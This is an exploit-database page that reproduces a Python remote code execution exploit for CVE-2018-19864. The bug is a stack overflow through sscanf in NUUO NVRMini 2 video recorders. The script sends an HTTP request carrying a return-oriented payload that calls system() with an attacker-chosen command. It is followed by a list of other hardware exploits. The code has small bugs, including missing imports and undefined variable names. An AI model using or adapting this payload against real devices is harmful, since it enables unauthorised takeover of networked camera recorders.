Menu

"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow"

Author

@0x00string

Platform

hardware

Release date

2019-06-04

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
#   [ leading / ]
#   [ Padding x 335 ]
#   [ original value at stack pointer + 158 ]
#   [ padding x 80 ]
#   [ address of (pop {r3,lr} ; bx lr) ]
#   [ system() address ]
#   [ address of (mov r0,sp ; blx r3) ]
#   [ command to execute ]

def banner():
    print '''
              @0x00string
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''

def usage ():
    print   ("python script.py <args>\n"
            "   -h, --help:             Show this message\n"
            "   -a, --rhost:            Target IP address\n"
            "   -b, --rport:            Target Port - default 5150\n"
            "   -c, --command:          Command to execute\n"
            "\n"
            "Example:\n"
            "python script.py -a 10.10.10.10\n"
            "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
    exit()

def main():
    rhost = None;
    rport = "5150";
    command = "{/bin/touch,/tmp/hax}"
    banner()
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a','--rhost'):
            rhost = arg;
        elif opt in ('-b','--rport'):
            rport = arg;
        elif opt in ('-c','--command'):
            command = arg;
    print ("Sending exploit to execute [" + command + "]\n")
    buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
    "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
    "http://" + rhost + ":" + rport + "\r\n\r\n"
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(30)
    sock.connect((target_ip,int(target_port)))
    sock.send(buf)
    print ("done\n")

if __name__ == "__main__":
    main()
Release Date Title Type Platform Author
2019-08-14 "D-Link DIR-600M - Authentication Bypass (Metasploit)" webapps hardware "Devendra Singh Solanki"
2019-08-12 "Cisco Adaptive Security Appliance - Path Traversal (Metasploit)" webapps hardware "Angelo Ruwantha"
2019-08-01 "Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery" webapps hardware "Alperen Soydan"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-07-24 "Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery" webapps hardware "Mehmet Onder"
2019-07-15 "CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities" webapps hardware Ramikan
2019-07-15 "NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass" webapps hardware Wadeek
2019-07-12 "Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting" webapps hardware ABDO10
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Root Exploit" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote Command Injection" webapps hardware LiquidWorm
2019-07-01 "FaceSentry Access Control System 6.4.8 - Remote SSH Root" remote hardware LiquidWorm
2019-06-25 "Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution" webapps hardware XORcat
2019-06-25 "SAPIDO RB-1732 - Remote Command Execution" remote hardware k1nm3n.aotoi
2019-06-17 "CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities" webapps hardware "Alex Akinbi"
2019-06-06 "Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion" webapps hardware "Dhiraj Mishra"
2019-06-03 "AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control" webapps hardware Luca.Chiou
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2019-05-22 "Carel pCOWeb < B1.2.1 - Credentials Disclosure" webapps hardware Luca.Chiou
2019-05-22 "Carel pCOWeb < B1.2.1 - Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-22 "AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting" webapps hardware Luca.Chiou
2019-05-21 "TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting" webapps hardware "purnendu ghosh"
2019-05-14 "D-Link DWL-2600AP - Multiple OS Command Injection" webapps hardware "Raki Ben Hamouda"
2019-05-10 "RICOH SP 4520DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "RICOH SP 4510DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-06 "LG Supersign EZ CMS - Remote Code Execution (Metasploit)" remote hardware "Alejandro Fanjul"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-04-30 "Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery" webapps hardware "Social Engineering Neo"
2019-04-30 "Intelbras IWR 3000N - Denial of Service (Remote Reboot)" webapps hardware "Social Engineering Neo"
Release Date Title Type Platform Author
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2014-04-23 "HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal" webapps hardware @0x00string
2014-03-12 "FreePBX 2.11.0 - Remote Command Execution" webapps php @0x00string
2017-02-14 "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure" remote hardware @0x00string
2017-02-03 "CUPS < 2.0.3 - Remote Command Execution" remote linux @0x00string
2014-10-02 "GNU bash 4.3.11 - Environment Variable dhclient" remote linux @0x00string
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46960/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46960/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46960/41372/nuuo-nvrmini-2-391-sscanf-stack-overflow/download/", "exploit_id": "46960", "exploit_description": "\"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow\"", "exploit_date": "2019-06-04", "exploit_author": "@0x00string", "exploit_type": "remote", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse